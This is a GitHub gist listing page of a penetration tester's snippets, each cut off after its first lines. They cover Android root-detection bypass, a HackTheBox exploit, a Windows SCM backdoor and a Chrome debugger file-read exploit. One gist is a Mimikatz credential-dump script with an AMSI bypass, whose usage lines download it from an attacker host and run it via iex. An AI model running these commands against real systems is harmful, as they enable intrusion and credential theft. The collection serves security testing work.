
LongCat pich4ya

@pich4ya
pich4ya / openssl3_no_md4.txt
Last active May 7, 2024 02:53
Fix evil-winrm error on macOS M1: "Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error"
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# gem install evil-winrm
# evil-winrm -u "${user}" -p "${pass}" -i "${ip}"
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
@pich4ya
pich4ya / root_bypass.js
Created August 5, 2019 20:14
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@pich4ya
pich4ya / htb_clicker.py
Last active April 20, 2024 14:21
Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564)
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564)
import requests
import random
import string
import urllib.parse
from base64 import b64encode,b64decode
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
@pich4ya
pich4ya / proxychains-ng_m1.txt
Created March 6, 2023 03:25
Install proxychains-ng on macOS m1/m2 arm64e natively without Rosetta 2 (2023)
# @author Pichaya Morimoto (p.morimoto@sth.sh)
Problem:
```bash
brew install proxychains-ng
proxychains4 ncat 1.2.3.4 # not working
```
There are public workarounds like https://benobi.one/posts/running_brew_on_m1_for_x86/
@pich4ya
pich4ya / bloodhound-python_issues.txt
Created April 16, 2024 05:13
Common solutions for Bloodhound-python errors, problems and issues
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Compiled list of my common bloodhound-python problems & solutions
Bloodhound-python Error #0
You do not get info such as GPOs and permission-abuse edges.
You need to add the option -c All,LoggedOn
Bloodhound-python Error #1
raise NoNameservers(request=self.request, errors=self.errors)
dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.pdc._msdcs.DCHOSTNAME. IN SRV: Server 10.3.3.7 TCP port 53 answered SERVFAIL
@pich4ya
pich4ya / SCM_backdoor.txt
Last active April 9, 2024 17:06
Persistence (Backdoor) access to Windows with SCM (Service Control Manager) a.k.a. psexec without admin users
@author LongCat (Pichaya Morimoto)
By default, only admin users have the right to manage the SCM,
but if you (mistakenly) grant a non-admin user the right to manage the SCM,
they will be able to perform tasks on behalf of admin / NT AUTHORITY\SYSTEM rights.
This is documented system design, mentioned in:
1. Service Security and Access Rights
https://docs.microsoft.com/en-us/windows/desktop/Services/service-security-and-access-rights
@pich4ya
pich4ya / Invoke-OneShot-Mimikatz.ps1
Last active March 9, 2024 02:40
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
@pich4ya
pich4ya / brain_check.py
Last active January 23, 2024 16:02
brain_check.py
# A numeric lock has a 3 digit key
# "682" - One number is correct and well placed
# "614" - One number is correct but wrongly placed
# "206" - Two number are correct but wrongly placed
# "738" - Nothing is correct
# "780" - One number is correct but wrongly placed
from z3 import *
# Create three integer variables for the lock digits
@pich4ya
pich4ya / chrome_remote_debug_lfi.py
Created March 6, 2023 11:49
Chrome Debugger Local File Inclusion (No CVE, a security misconfiguration if the port is accessible for the attacker)
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb
# pip install requests websocket-client python-socks
# This exploit code can be used to read arbitrary files on the victim machine with
# chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase
import requests
import json
import urllib3
import websocket
@pich4ya
pich4ya / gist:1ac125726e4f79c6832899e6c9b7bde1
Last active December 21, 2023 10:19
How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# How to MITM-intercept the Web API of an iOS app through MacOS -> Burp Suite acting as an unaware proxy
# (e.g. Xamarin, Flutter apps that do not go through the System Proxy and do not use the default Cert Store on the iPhone)
# If it is a normal app that already uses the system proxy, you do not need to do this; just set the proxy as usual
1. Connect the iPhone (already jailbroken) to the MBP via USB, then use iproxy so that local port 8080 on the iPhone is forwarded to local port 8080 on the MBP with an ssh reverse tunnel (-R)
$ brew install usbmuxd
$ iproxy 2222 22 & disown && ssh -R 8080:localhost:8080 -p 2222 root@127.0.0.1 -N -f